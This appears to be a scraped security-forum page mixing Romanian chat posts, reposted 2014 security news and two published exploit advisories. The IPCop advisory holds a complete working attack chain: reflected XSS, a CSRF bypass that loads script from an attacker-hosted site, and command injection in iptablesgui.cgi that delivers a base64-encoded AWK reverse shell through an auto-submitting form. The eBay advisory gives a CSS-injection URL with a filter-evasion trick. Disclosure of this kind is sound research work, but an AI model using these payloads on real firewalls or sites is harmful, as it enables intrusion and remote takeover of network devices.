m-am exprimat eu gresit probabil dar daca nu esti capabil sa intelegi asta e partea a doua!

e pentru o versiune de firewall specifica unui anumit gen de router.

[BitTorrent Invites Sony to Release 'The Interview' Movie On Its Paid Service]

Sony was forced to pull the cinema release of "The Interview," scheduled for Christmas day, after hacker group Guardians of Peace (GOP) threatened to attack any theater that decided to show the film. But the studio will release the controversial North Korean-baiting film via different alternatives.

HACKERS WARNED OF TERROR ATTACK

The massive hacking attack against Sony Pictures Entertainment is getting worst day by day. The hack has yet exposed about 200 gigabytes of confidential data belonging to the company from upcoming movie scripts to sensitive employees data, celebrities phone numbers and their travel aliases, and also the high-quality versions of 5 newest films leak, marking it as the most severe hack in the History.

Week back, the hacker group GOP, who has claimed responsibility for the damaging Sony cyber-attack, demanded Sony to cancel the release of "The Interview" — the Seth Rogen and James Franco-starring comedy centered around a TV host and his producer assassinating North Korean dictator Kim Jong Un, citing terror threats against movie theatres.

At the beginning of the month when GoP group send a threatening email to Sony executives, they didn't even ask the company to cancel the release of The Interview movie. They never released any statement regarding the movie, but later with second hack they actually demand for the same. It seems that hackers got this TIP from media suggestions and put all the blame to North Korea for making this Drama more interesting.

PULLING THE INTERVIEW – A VERY COWARD ACTION

Not just GOP, the studio has been threatened by a number of hackers group including a group identifying itself as Anonymous. In a statement on Monday to Sony Entertainment CEO Michael Lynton, the hackers group warned the studio to release "The Interview" as originally planned, or else face more damaging hacks.

The Anonymous group also denies that the Sony hackers are linked to North Korea, despite the FBI’s revelation Friday that their probe had determined as much. The group criticized Sony for pulling the movie, saying it was a "very cowardly" act of both the CEO and the organization, alleging it showed "panicking at first sight of trouble."

In fact, President Barack Obama also expressed disappointment in Sony’s decision to pull the film and announced Friday that the studio had made "a mistake" by withdrawing the movie, but said it was the private company's right to do so.

SONY INTENDS TO RELEASE THE INTERVIEW

In response, Michael Lynton, the studio’s chief executive, said that it had "not caved" to hackers who harmed the company and that the studio itself intends to release its controversial film and exploring ways to let audiences see the film, possibly Youtube..

"We would still like the public to see this movie, absolutely," Lynton said during an interview. "There are a number of options open to us. And we have considered those, and are considering them."

BITTORRENT CAME UP WITH A GOOD IDEA

Meanwhile, the popular file-sharing giant BitTorrent has suggested Sony a way to release the controversial film using its new alternative digital-distribution paygate for artists, BitTorrent Bundle, a paid service. The San Francisco-based company believes BitTorrent Bundle is the best way to satisfy both online downloaders and Sony’s desire to release the film.

According to BitTorrent, it's a totally "safe and legal way" for Sony to release "The Interview", with up to 20,000 creators and rights holders currently using the publishing platform. Notably, BitTorrent Bundle had released "The Act Of Killing," a 2012 Oscar-nominated documentary account of mass murder in 1960s Indonesia that stirred controversy for criticizing government officials. The feature was downloaded over 3.5 million times.

Now, let’s wait and watch what Sony decides about BitTorrent offer, but it is very clear that the studio has never been a fan of torrents and if the company accept the offer from the file-sharing giant then it would be an unlikely deal. But this deal sounds to be a convenient one both for Sony and viewers.

Source

[SoakSoak Malware Campaign Evolves]

The attackers behind the SoakSoak malware campaign are continuing to modify their tactics and have infected a new group of Web sites. The Javascript code that the attackers target with the malware has also changed.

Last week, Google took the step of blacklisting thousands of sites that had been infected by SoakSoak. The malware is targeting WordPress sites and the attackers can inject their malicious code into various Javascript files. Originally, the attackers were targeting wp-includes/template-loader.php, and once the file is modified, the attackers’ Javascript can appear on every page on an infected site. That code will then download malware from a remote domain.

The attackers have now begun targeting a different file, wp-includes/js/json2.min.js, which is being modified to load a malicious Flash file.

“The hidden iFrame URL in swfobjct.swf now depends on another script from hxxp://ads .akeemdom . com/db26, also loaded by malware in json2.min.js,” researchers at Sucuri wrote in an analysis of the attack.

The SoakSoak malware campaign is targeting older versions of a popular WordPress plugin called RevSlider. Versions prior to 4.2 are being exploited, Denis Sinegubko of Sucuri said. The vulnerability in the plugin was disclosed several months ago and was discussed on underground forums.

“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner. Some website owners don’t even know they have it as it’s been packaged and bundled into their themes,” Daniel Cid of Sucuri wrote last week.

The vulnerability was patched silently by the plugin’s developers, but sites that have not been updated are still vulnerable to these kinds of attacks.

Source

[Tinc Virtual Private Network Daemon 1.0.25]

tinc is a Virtual Private Network (VPN) daemon that uses tunneling and encryption to create a secure private network between multiple hosts on the Internet. This tunneling allows VPN sites to share information with each other over the Internet without exposing any information.

Changes: Documentation updates. Support linking against -lresolv on Mac OS X. Fixed scripts on Windows when using the ScriptsInterpreter option. Allowed a minimum reconnect timeout to be specified. Added support to PriorityInheritance on IPv6 sockets.

Download

[IPCop 2.1.4 Cross Site Request Forgery / Cross Site Scripting]

######################################################################
# Exploit Title: IPCop <= 2.1.4 XSS to CSRF to Remote Command Execution
# Date: 21/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ipcop.org - www.ipcop.org/download.php
# Version: 2.1.4
# Category: Remote Command Execution
# Google dork:
# Tested on: IPCop distribution
######################################################################


IPCop firewall/router distribution description :
======================================================================

IPCop is a Linux distribution which aims to provide a simple-to-manage firewall appliance based on PC hardware. IPCop is a stateful firewall built on the Linux netfilter framework.
Originally a fork of the SmoothWall Linux firewall, the projects are developed independently, and have now diverged significantly.
IPCop includes a simple, user managed update mechanism to install security updates when required.

In version <= 2.1.4 of the distribution, different vulnerabilities can be used to gain a Remote Command Execution (reverse-shell).
In version <= 2.1.2 of the distribution, a Reflected XSS is available. Through this RXSS, the full reverse-shell can be obtained with only one URL.


Proof of Concept 1 :
======================================================================

A non-persistent XSS in GET param is available in the ipinfo.cgi. The injection can be URLencoded with certain browsers.
This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade).

File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
    &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);

PoC:

https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script>


Proof of Concept 2 :
======================================================================

CSRF exploit bypass from previous XSS.
IPCop is protected against CSRF attack with a referer checking on all page.
It's possible to bypass this protection with the previous XSS detailed.
To do this, load a third party JS script with the XSS, and make Ajax request over IPCop context (so with the right referer).
This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade).

File /home/httpd/cgi-bin/ipinfo.cgi line 82 :
    &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname);

PoC :

Host a third party JS script on a web server accessible from IPCop. In this JS script, load JQuery dynamically and perform any AJAX request to an IPCop targeted page.
All AJAX request bypass the CSRF protection.

 * Third party JS script, host in http://<PENTESTER_WEBSITE>/x.js:

var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq); // jquery dynamic loading
function loadX(){
    $.ajax({
      type: 'POST',
      url: "https://<IPCop_IP>:8443/cgi-bin/<TARGETED_PAGE>",
      contentType: 'application/x-www-form-urlencoded;charset=utf-8',
      dataType: 'text',
      data: '<YOUR_DATA>'
    }); // payload of your choice
  }
setTimeout("loadX()",2000);

 * XSS to load dynamically this third party script :

var head=document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://<PENTESTER_WEBSITE>/x.js';head.appendChild(script);

 * Escape this string with escape() Javascript method :

%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09

 * Make the final URL with XSS in GET param that load dynamically the third party script (IE) :

https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09"))</script>


Proof of Concept 3 :
======================================================================

Remote Command Execution in the iptablesgui.cgi file. This file is protected from CSRF execution.
Affected version <= 2.1.4 (patched in 2.1.5 upgrade).

File /home/httpd/cgi-bin/iptablesgui.cgi line 99 (and also 102) :
    $output = `/usr/local/bin/iptableswrapper $cgiparams{'TABLE'} 2>&1`; 

The $cgiparams{'TABLE'} isn't sanitized before execution in command line. It's possible to change the "TABLE" post data with arbitrary data.
To chain commands in this instruction, only || are usable (not && nor . So the first part of the command needs to return a false status.
It can be done with no additional param :

/usr/local/bin/iptableswrapper <NOTHING HERE> || <my personnal command will be executed here>

So the RCE can be exploited with this PoC (if the Referer is defined to IPCop URL) :

<html>
  <body>
    <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
      <input type='hidden' name='TABLE' value='||touch /tmp/x;#' />
      <input type='hidden' name='CHAIN' value='' />
      <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
    </form>
    <script>document.forms['x'].submit();</script>
  </body>
</html>

Note that the ACTION POST param depend on the IPCop language defined.


Proof of Concept 4 :
======================================================================

Finally, with these three previous PoC, it's possible to combine all the mechanisms to gain a full reverse-shell on IPCop.
IPCop does not have netcat nor telnet, socat, python, ruby, php etc ...
The only way to make a reverse-shell is to use Perl or AWK technics. In this PoC, it's the AWK technic that is used :
(From ASafety Reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/)

 * The reverse-shell one-line with AWK is :

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

 * To bypass IPCop filter, you need to encode this command in base64 (after modify <IP> and <PORT>) :

YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsgfX0nIC9kZXYvbnVsbA==

 * Place a \n at each bloc of 64 chars in the base64 version :

YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==

 * This payload can be echo'ed and decoded with openssl, on the fly, into IPCop :

echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d

 * To execute this payload, add backticks and eval call :

eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`

 * Your payload is ready to be used into TABLE POST param in iptablesgui.cgi, like the previous PoC :

||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#

 * Full PoC (IPCop <= 2.1.2, RXSS patched in 2.1.3 upgrade but RCE available to 2.1.4, patched in 2.1.5 upgrade) 
 (if the referer is defined to IPCop URL, and a netcat is listening # nc -l -vv -p 1337) :

<html>
  <body>
    <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'>
      <input type='hidden' name='TABLE' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#' />
      <input type='hidden' name='CHAIN' value='' />
      <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' />
    </form>
    <script>document.forms['x'].submit();</script>
  </body>
</html>

Note that none <IP>/<Port> are defined in the previous payload, you need to reproduce these different steps.

 * With the XSS method to bypass CSRF Referer checking, the third party JS script can be :

var headx=document.getElementsByTagName('head')[0];
var jq= document.createElement('script');
jq.type= 'text/javascript';
jq.src= 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
function loadX(){
    $.ajax({
      type: 'POST',
      url: "https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi",
      contentType: 'application/x-www-form-urlencoded;charset=utf-8',
      dataType: 'text',
      data: 'CHAIN=&ACTION=Rafra%C3%AEchir&TABLE=%7C%7Ceval+%60echo+-e+%22YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA%22%22+%7C+openssl+enc+-a+-d%60%3B%23'
    });
  }
setTimeout("loadX()",2000);

 * A demonstration video has been realised as PoC here (IPCop 2.0.6 but work on IPCop 2.1.2) : https://www.youtube.com/watch?v=ovhogZGHyMg


Solution:
======================================================================

- To patch the RXSS, install IPCop >= 2.1.3 or upgrade to 2.1.3.
- To patch the RCE, install IPCop >= 2.1.5 or upgrade to 2.1.5. 


Report timeline :
======================================================================

2013-03-31 : Team alerted with details, PoC and video (via Sourceforge)
2013-04-09 : Second alert sent to the team (via Sourceforge)
2013-04-25 : Third alert sent to the IPCop english support forum
2013-04-25 : PoC added in private on the sourceforge bug tracker, no response
2013-04-30 : Ticket priority change from 5 to 8, no response.
2014-02-13 : IPCop 2.1.1 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-03-03 : IPCop 2.1.2 released, RXSS not fixed, RCE not fixed, no news on ticket.
2014-04-03 : IPCop 2.1.3 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-04-08 : IPCop 2.1.4 released, RXSS fixed, RCE not fixed, no news on ticket.
2014-05-02 : IPCop 2.1.5 released, RXSS fixed, RCE fixed, no news on ticket.
2014-12-21 : Public article on ASafety and public advisory


Additional resources :
======================================================================

- www.ipcop.org
- sourceforge.net/p/ipcop/bugs/807/
- sourceforge.net/projects/ipcop/
- www.synetis.com
- www.asafety.fr
- www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution
- www.youtube.com/watch?v=ovhogZGHyMg


Credits :
======================================================================

    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety


--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr

Source

[eBay.com ocsnext CSS Injection]

######################################################################
# Exploit Title: eBay.com ocsnext sub-domain Reflected CSS injection
# Date: 20/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.ebay.com
# Version: /
# Category: Reflected CSS injection
# Google dork:
# Tested on: eBay.com ocsnext sub-domain
######################################################################

Adobe description :
======================================================================

eBay Inc., is an American multinational corporation and e-commerce company, providing consumer-to-consumer & business-to-consumer sales services via Internet. 
It is headquartered in San Jose, California, United States. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; 
it is a multi-billion dollar business with operations localized in over thirty countries.

The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide.


Vulnerability description :
======================================================================
A CSS injection is available in the ocsnext.ebay.com sub-domain.
Through this vulnerability, an attacker could tamper with page rendering, and potentially injects JavaScript to generate Reflected XSS (RXSS) to 
redirect victims to fake eBay portals, or capture eBay's users credentials such cookies. 
This CSS injection is on GET "query" variable and is not properly sanitized before being used to his page.


Proof of Concept 1 :
======================================================================

A non-persistent CSS injection and potentially RXSS in "query" GET param is available in the ocsnext.ebay.com sub-domain.
Test with FireFox 30.0 and Chrome 36.0.1985.125.

Using eBay's services, the vulnerability injection (HTML, CSS and JavaScript potentially) affect a page of ocsnext.ebay.com domain (*.ebay.com) once authenticated. 

The injection is used to define arbitrary attributes on an input tag type "hidden": 
<input type="hidden" name="query" value="[INJECTION]" /> 

It is possible to define the "style" attribute to load the CSS on the fly and possibly make XSS based browsers and their versions 
(-moz-binding, expression(), background-image: url(javascript:) ) ...

Chars like "<" or ">" are encoded, and strings like "http://" are filtered. To evade the "http://" filter, evasion vector "http:/%26%23x0D%3B/" is used.

PoC: 
http://ocsnext.ebay.com/ocs/cusr?query=x" style="background-image:url('http:/%26%23x0D%3B/www.asafety.fr/images/logo.png')&domain=TechnicalIssues&from=404_error


Screenshots :
======================================================================

- http://www.asafety.fr/data/20140721-ebay_css_injection_01.png 


Solution:
======================================================================

Fixed by eBay / PayPal / Magento security team.


Additional resources :
======================================================================

- http://www.ebay.com/
- http://ebay.com/securitycenter/ResearchersAcknowledgement.html
- http://www.asafety.fr/vuln-exploit-poc/contribution-ebay-css-injection-xss-potentielle/
- http://www.synetis.com/2014/08/22/contribution-securite-debay/


Report timeline :
======================================================================

2014-07-21 : eBay Team alerted with details and PoC.
2014-07-21 : eBay response and ack.
2014-07-21 : eBay validate the issue and awaiting fix.
2014-08-21 : eBay fixed the issue and acknowledgement
2014-08-22 : Public article on SYNETIS website.
2014-12-20 : Public article and PoC on ASafety website
2014-12-20 : Public advisory


Credits :
======================================================================

    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr

Source

[Ce este un hacker?Si ce stie sa faca un hacker?]

Un hacker bun e ala care nu isi face publicitate ( adica sta in underground ).

Un hacker bun nu e cel care sparge multe site-uri, un hacker bun e acela ce se protejeaza pe el insusi!

[2014: A Specious Odyssey]

The wonderful and terrifying thing about the security world is that things never stay calm for long. As soon as you think you have a chance to catch your breath, someone breaks something and it’s time to scramble again. In 2014, those small moments of downtime were hard to come by. There was a seemingly endless parade of major vulnerabilities, data breaches and high-profile hacks. It was a year filled with Heartbleeds, POODLEs, Shellshock and a lot of pain for users, administrators and anyone else who likes to do things on the Interweb. Thankfully, the network is still standing after all that, so we went back and looked at all the stories we did this year and picked out the 10 most popular ones, put a fresh coat of paint on them and put them together to give you a picture of the year that was in security. Enjoy.

PNG Image Metadata Leading to iFrame Injections

If there’s one thing attackers love, it’s Javascript. It’s the gift that keeps on giving and in 2014 one of the presents it gave us was the ability to deliver malware through the use of the metadata in an obfuscated PNG image file. Researchers at Sucuri discovered that some attackers were using the technique to trigger an iframe that calls the image’s metadata, which is outside the browser’s viewing area. The browser can still read the data though and can be used in drive-by downloads and other attacks. Easy workaround: Don’t look at pictures on the Internet.

Seriousness of OpenSSL Heartbleed Bug Sets In

As Code Red once was the standard for Internet worms, Heartbleed has become the bar to which other Internet-wide bugs must now aspire. The vulnerability in the heartbeat extension of OpenSSL caused Web-wide panic when it was disclosed in April and its effects are still being felt eight months later. OpenSSL is deployed in an untold number of products, and the bug affects both clients and servers, so attackers had a Cheesecake Factory menu of targets at their disposal. Rumors of Heartbleed’s discovery by the NSA appear to be exaggerated, but the bug can be blamed for starting the vulnerability-as-celebrity trend. So, thanks, Heartbleed.

Major Bash Vulnerability Affects Linux, UNIX, Mac OS X

These are not words you want to hear when a new vulnerability is disclosed: “It’s super simple and…It’s extremely serious.” That’s how a security engineer at Red Hat described the Shellshock flaw in the Bash command line tool, a bug that affected Unix, Linux and OS X and allows attackers to execute whatever code they want on target systems. Which, as it turns out, is undesirable. Vendors scrambled to patch their products, while hackers did what they do: hack. Shellshock also carried on the proud tradition of vulnerability branding and logo production.

Browser Vendors Move to Disable SSLv3 in Wake of POODLE Attack

2014 was not a great year for SSL. And by not great, we mean terrible. Really, really terrible. As if the Heartbleed bug wasn’t enough, in October researchers from Google revealed a new attack on SSLv3 that could let attackers decrypt secure connections in some circumstances. In response to the disclosure, browser vendors have begun disabling SSLv3 support, a move that was long overdue. The protocol is older than half the kids trying to exploit it using POODLE. But news came out recently that TLS—the replacement for SSL—is also vulnerable to the attack in some implementations. But the good news is, well, nothing.

Hacker Puts Hosting Service Code Spaces Out of Business

Most high-profile attacks these days result in data being stolen and sometimes leaked online (see: Sony). But in June we saw an attack on Code Spaces, a hosting and collaboration platform provider, that forced the company to go out of business. The company was hit with a DDoS attack that was quickly followed by a compromise of its Amazon EC2 control panel. The hackers destroyed the company’s data, including its backups, and Code Spaces informed customers within a few hours that it was going to cease operations. This kind of devastating attack is a rarity, but not unique.

Researcher Finds Tor Exit Node Adding Malware to Binaries

Tor has become a safe haven for people eager to protect the privacy of their online activities. In turn, hackers have taken to Tor not only to carry out DDoS and spam campaigns, but also to load malware on unsuspecting users’ machines. Security researcher Josh Pitts in October identified a Tor exit node that was surreptitiously adding malware to binaries users downloaded using the Tor browser. The exit node was subsequently flagged by the Tor Project, but not before it infected machines with code that opened ports listening for commands and sent HTTP requests to a remote server.

The Internet is Broken, Act Accordingly

Now that the curtain has been thrown back on the depth and breadth of government surveillance of Internet activities, the time has come to heed some cautious advice: Behave online as if someone is monitoring you—because they are. Security researchers are particularly aware of this dynamic because their work is of keen interest to intelligence outfits, hackers and defenders—all of whom would like to know what they know. No one can afford to be complacent or indifferent to Internet threats, whether they’re state-sponsored or criminally motivated. As Kaspersky Lab senior research Costin Raiu advises: The Internet is broken, act accordingly.

Passcode Bypass Bug and Email Attachment Encryption Plague iOS 7.1.1

An Egyptian neurosurgeon and self-proclaimed baseband hacker disclosed the details of an iPhone lockscreen bypass technique that allows an attacker in physical possession of an Apple iPhone 5 device running iOS 7.1.1 at the time to access contacts and make phone calls. The vulnerability allows an attacker to bypass not only the lockscreen, but also the new TouchID fingerprint sensor that arrived with the latest iPhones. The trick to beating these protections is to use the device’s voice-recognition program Siri which after some prompting, presented the good doctor with the ability to scroll through contacts. The Siri bug was a double whammy for Apple, which also had to deal with a separate issue in iOS 7.1.1 that prevented email attachments from being properly encrypted. Both issues were patched.

UltraDNS Dealing With DDoS Attack

Big DNS service provider UltraDNS in April was put on its heels having to beat back a DDoS attack that kept many of its customers offline. It was a hectic day for website operators who relied on UltraDNS’ services. Ultimately, it turned out that a massive 100 Gbps DDoS attack against one of UltraDNS’ customers resulted in latency issues for others. The attack against UltraDNS was just the latest volumetric DDoS attack to be reported. Attacks ranging between 70 Gbps and more than 400 Gbps were happening with greater frequency against high value financial targets, as well as core infrastructure providers such as UltraDNS. Many such DNS amplification attacks take advantage of the millions of open DNS resolvers listening online to amplify traffic exponentially, spoofing requests to the intended target. UltraDNS mitigated its situation within hours.

Audit Project Releases Verified Repositories of TrueCrypt 7.1A

In a year of bizarre stories, hacks and Internet-wide vulnerabilities, there may not have been a stranger story than in May the abrupt shutdown of TrueCrypt, the popular open source encryption software package. TrueCrypt’s maintainers’ decision to shut down the project kicked off speculation about whether the software had been hacked or infiltrated by the National Security Agency. In an attempt to get some answers, the Open Crypto Audit Project was formed with the express mission of auditing the TrueCrypt code looking for a backdoor. In June, OCAP posted a verified repository of TrueCrypt 7.1a, the last known good TrueCrypt archive. The experts involved in the project created the verified repository by comparing the SHA2 hashes with files found in other TrueCrypt repositories, ensuring their integrity.

Source

[Mesaj pentru inapti]

@MrGrj prin acest post nu ai facut nimic decat sa le dau acelor ratati satisfactie ( se simt si ei cineva )

oamenii de genul nu trebuie bagati in seama!

[South Korea nuclear plant hit by hacker]

Computers at a nuclear power plant in South Korea have been compromised by a hacker, but the plant's operator says no critical data has been leaked.

The hacker was able to access blueprints, floor maps and other information on the plant, the South Korean Yonhap News Agency reported Sunday. Using a Twitter account called "president of anti-nuclear reactor group," the hacker has released a total of four postings of the leaked data since December 15, each one revealing internal designs and manuals of the Gori-2 and Wolsong-1 nuclear reactors run by Korea Hydro and Nuclear Power Co. (KHNP), Yonhap added. The hacker has threatened to leak further information unless the reactors are shut down.

KHNP has insisted that the leaked information is not critical and does not undermine the safety of the reactors. The company also played down the threat of any type of cyberattack, saying that the reactors' controllers are protected because they're not linked to any external networks, according to the Wall Street Journal.

The hacking against KHNP nuclear plants occurs in the midst of a major hack against Sony Pictures over its movie "The Interview," a comedy about an assassination attempt against North Korean leader Kim Jong-un. The FBI has accused North Korea of orchestrating the Sony hack, though the country has denied any involvement. As a further response, North Korea suggested a joint investigation into the hack with the US but then accused the US of being involved in the making of the film, according to The Guardian.

Despite the increased tension, no fingers have been pointed at North Korea for the hacking against the KHNP power plants. An official at KHNP told Reuters that the hacking appeared to be the work of "elements who want to cause social unrest," but added that he had no one specific in mind.

Government officials looking into the incident were able to trace the hacker's IP address to a PC located in a specific location, Yonhap said. Investigators have been sent to the location as well as to the plant's reactors to probe further.

Source

[Apple updates Macs for first time without asking -- to foil hackers]

Apple is updating its Macs to guard against hackers taking control -- the first time a Mac update has been sent out automatically without requiring your permission.

The automated security update protects Apple laptops and desktops from newly discovered security vulnerability CVE-2014-9295, which affects OS X and other Linux and Unix distributions.

Speaking to Reuters, Apple spokesperson Bill Evans described Monday's update as "seamless" and noted that Mac users don't even need to restart their computers.

Apple isn't the only company that could be vulnerable to the security bug, which was revealed Friday by the US Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. Researchers warn that vulnerabilities in a computer's network time protocol (NTP), which sync a computer's clocks, could allow hackers to take control of a computer remotely.

"Apple's proactive steps to automatically remediate this particular vulnerability shows the need to quickly patch remotely exploitable vulnerabilities," says security analyst Ken Westin of Tripwire. "However, the use of Apple's automatic deployment tool is not without risks, as even the simplest update can cause problems for some systems. In this case the update may have been so minor the risk of affecting other applications and processes was minimal."

